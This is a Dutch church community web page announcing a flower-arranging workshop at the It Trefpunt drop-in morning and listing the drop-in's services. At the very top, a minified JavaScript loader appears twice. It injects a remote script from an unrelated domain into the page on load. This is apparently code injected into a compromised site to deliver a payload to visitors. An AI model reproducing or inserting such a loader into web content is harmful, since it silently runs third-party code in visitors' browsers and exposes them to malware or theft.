;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bloemschikken tijdens de inloopochtend van It Trefpunt - PKN Damwâld

Bloemschikken tijdens de inloopochtend van It Trefpunt

Gepubliceerd op: donderdag 18 april 2019

Er bleek op 17 april bij de inloopochtend van It Trefpunt een behoorlijke belangstelling te zijn voor de workshop ‘bloemschikken’. De workshop werd verzorgd door de Klaasje Gros. Zij begeleidde vol enthousiasme de deelnemers bij het maken van een prachtig bloemstuk. De resultaten mochten er zijn! Veel deelnemers konden het zich vooraf niet voorstellen dat ze ooit zo’n mooi stuk konden maken. Maar aan het einde van de gezellige workshop gingen alle deelnemers trots en tevreden met een mooi bloemstuk naar huis. Op bijgaande foto’s de deelnemers in actie en met hun resultaten. En die mochten er zijn!

1 keer in de 14 dagen, op donderdagochtend, is er Inloop vanaf 09.30 uur. In het voorjaar van 2016 zijn wij hiermee gestart en het is een groot succes. Iedereen, oud of jong en kerkelijk of niet, is van harte welkom. Er is gratis koffie/thee/fris en u kunt de krant lezen, spelletjes doen of gezellig met elkaar praten. We hebben ook veel boeken en tijdschriften die u kunt meenemen. U mag ook eigen boeken inleveren. Regelmatig is er tijd voor het maken van (wens) kaarten of bloemstukjes of voor schilderen en kwissen. Kapotte (elektrische) spulletjes meenemen voor ons repaircafe mag, indien u geen financiële of andere mogelijkheden heeft om die te laten maken. Wij bieden hulp bij moeilijke (financiële) brieven en vervoer als u naar de Inloopochtenden wilt of ergens anders naar toe moet bijv. het ziekenhuis. Voorlichting, over Zorg en WMO, krijgt u van het Friese Land, Zorgcombinatie Interzorg of de Buurtzorg. Medewerksters van die organisaties zijn om beurten aanwezig.

Heeft u vragen, wilt u ergens gebruik van maken: koopschaafsma@hotmail.nl tel. 613765741